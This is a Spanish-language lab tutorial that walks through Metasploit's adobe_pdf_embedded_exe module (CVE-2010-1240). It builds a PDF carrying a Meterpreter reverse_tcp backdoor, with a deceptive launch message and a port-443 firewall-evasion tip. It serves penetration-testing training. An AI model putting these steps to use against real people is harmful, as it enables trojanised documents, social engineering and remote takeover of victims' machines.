Introducción
En este laboratorio, exploraremos cómo aprovechar la vulnerabilidad del módulo incrustado en Adobe PDF para inyectar una puerta trasera (backdoor) de Windows. El proceso del laboratorio implica transmitir un archivo PDF que contiene una puerta trasera a un host de Windows, el cual infectará el sistema Windows objetivo cuando el propietario abra el archivo PDF utilizando Adobe Reader.
El entorno de laboratorio proporcionado por LabEx carece de una máquina virtual de Windows, por lo que no podemos verificar la efectividad del ataque. El proceso del laboratorio solo demostrará cómo incrustar el programa de la puerta trasera.
Además, no es necesario iniciar una máquina objetivo en este laboratorio. Solo es necesario iniciar el entorno de Kali Linux, y el archivo PDF creado con éxito se colocará en el directorio /root/ del host de Kali.
Iniciar la consola de Metasploit Framework
Ahora iniciarás la máquina de ataque (contenedor de Kali Linux) y la máquina objetivo (máquina virtual Metasploitable2) para el experimento.
- Abre una terminal xfce en la máquina host de LabEx e inicia la máquina objetivo Metasploitable2 ejecutando el siguiente comando:
sudo virsh start Metasploitable2
Espera a que la máquina objetivo se inicie, puede tardar de 1 a 3 minutos.
- Prueba la conectividad a la máquina objetivo mediante un ping:
ping 192.168.122.102
Presiona Ctrl+C para detener el ping.
- Inicia el contenedor de Kali Linux y entra al entorno bash ejecutando:
docker run -ti --network host b5b709a49cd5 bash
- Dentro del contenedor de Kali, prueba la conexión de red a la máquina objetivo:
ping 192.168.122.102
Presiona Ctrl+C para detener el ping.
Ahora tanto la máquina de ataque como la máquina objetivo están en funcionamiento, y puedes comenzar la prueba de penetración.
Nota: Si sales accidentalmente del bash actual, el contenedor de Kali se detendrá automáticamente. Puedes ejecutar docker run -ti --network host b5b709a49cd5 bash nuevamente en el host para iniciar un nuevo contenedor de Kali y entrar en bash para continuar el experimento.
En el contenedor de Kali Linux, ingresa los siguientes comandos en la terminal bash de Kali Linux:
service postgresql start
msfdb init
cd ~
msfconsole
Esto iniciará el servicio de la base de datos PostgreSQL, inicializará la base de datos y lanzará la consola del Framework Metasploit (msfconsole) para realizar operaciones adicionales.
Utilizar el módulo de explotación
En la msfconsole, ejecuta el siguiente comando para utilizar el módulo de explotación:
use exploit/windows/fileformat/adobe_pdf_embedded_exe
Esto cargará el módulo de explotación adobe_pdf_embedded_exe, que nos permite incrustar una carga útil ejecutable en un archivo PDF.
Utiliza el comando show options para ver las opciones configurables del módulo de explotación:
show options
Esto mostrará las opciones disponibles, como:
EXENAME: La ruta al archivo ejecutable que se incrustará en el PDF.FILENAME: El nombre del archivo PDF de salida (por defecto:evil.pdf).INFILENAME: La ruta completa al archivo PDF de entrada (por defecto: un archivo PDF incorporado).LAUNCH_MESSAGE: El mensaje de aviso para engañar al usuario y que ejecute el ejecutable incrustado.
Puedes dejar la mayoría de las opciones con sus valores predeterminados, pero es posible que desees establecer la opción INFILENAME para especificar la ruta al archivo PDF de entrada que deseas infectar.
Después de configurar las opciones, utiliza el comando exploit para ejecutar el ataque:
exploit
Esto incrustará la carga útil en el archivo PDF de entrada especificado y generará un nuevo archivo PDF con el ejecutable incrustado.
Presiona Ctrl+D para salir de la consola de Metasploit y luego comienza la inspección
Examinar la salida
Después de ejecutar la explotación, el archivo PDF generado que contiene la carga útil maliciosa se encontrará en /root/.msf4/local/evil.pdf. Puedes salir de la msfconsole y examinar el archivo:
ls -l /root/.msf4/local/evil.pdf
Deberías observar un aumento en el tamaño del archivo, lo que indica la presencia del ejecutable incrustado. Cuando se abra el archivo PDF, se mostrará el mensaje de inicio configurado, invitando al usuario a hacer clic y ejecutar el programa incrustado.
Configurar una carga útil personalizada
Para hacer que el PDF infectado sea más valioso, podemos configurar una carga útil personalizada para él.
Vuelve a entrar en la msfconsole:
cd ~
msfconsole
En la msfconsole, sigue los pasos anteriores para seleccionar el módulo de ataque:
use exploit/windows/fileformat/adobe_pdf_embedded_exe
Esta vez, utilizaremos la carga útil windows/meterpreter/reverse_tcp, que es una puerta trasera (backdoor) de Meterpreter que establece una conexión TCP desde el host comprometido hacia la máquina del atacante, lo que permite el acceso directo al sistema comprometido. Puedes utilizar el comando show payloads para ver y seleccionar otras cargas útiles si lo deseas.
Configura la carga útil windows/meterpreter/reverse_tcp:
set payload windows/meterpreter/reverse_tcp
Configura la carga útil especificando la dirección IP y el puerto de tu host de Kali para recibir la conexión entrante. Asegúrate de que el host objetivo pueda conectarse a tu host de Kali:
set lhost 192.168.122.1
Utilizar el puerto 443 puede ayudar a evitar algunos firewalls:
set lport 443
Luego, utiliza el comando exploit para generar el PDF malicioso:
exploit
Presiona Ctrl+D para salir de la consola de Metasploit y luego comienza la inspección
Examinar la salida nuevamente
Verifica el tamaño del archivo PDF generado:
ls -l /root/.msf4/local/evil.pdf
Deberías notar que el tamaño del archivo es menor que con la carga útil predeterminada, ya que la carga útil windows/meterpreter/reverse_tcp es más compacta.
Resumen
En este laboratorio, aprendimos cómo aprovechar la vulnerabilidad de Adobe Reader (CVE-2010-1240) que no valida el contenido incrustado en archivos PDF. Al incrustar un programa de puerta trasera (backdoor) en un archivo PDF y engañar al usuario para que lo ejecute, podemos obtener acceso al host de Windows objetivo. Los puntos clave cubiertos en este laboratorio incluyen:
- Comandos básicos de Linux
- Operaciones en la consola del Framework Metasploit
- Introducción a la vulnerabilidad de Adobe PDF Embedded EXE (CVE-2010-1240)
- Cómo explotar la vulnerabilidad e incrustar un programa de puerta trasera
El laboratorio proporcionó experiencia práctica en la creación de archivos PDF maliciosos con cargas útiles incrustadas, la configuración de diferentes opciones y la comprensión del impacto de diferentes cargas útiles en el tamaño del archivo. Este conocimiento puede ser útil para entender y mitigar este tipo de ataques en escenarios del mundo real.



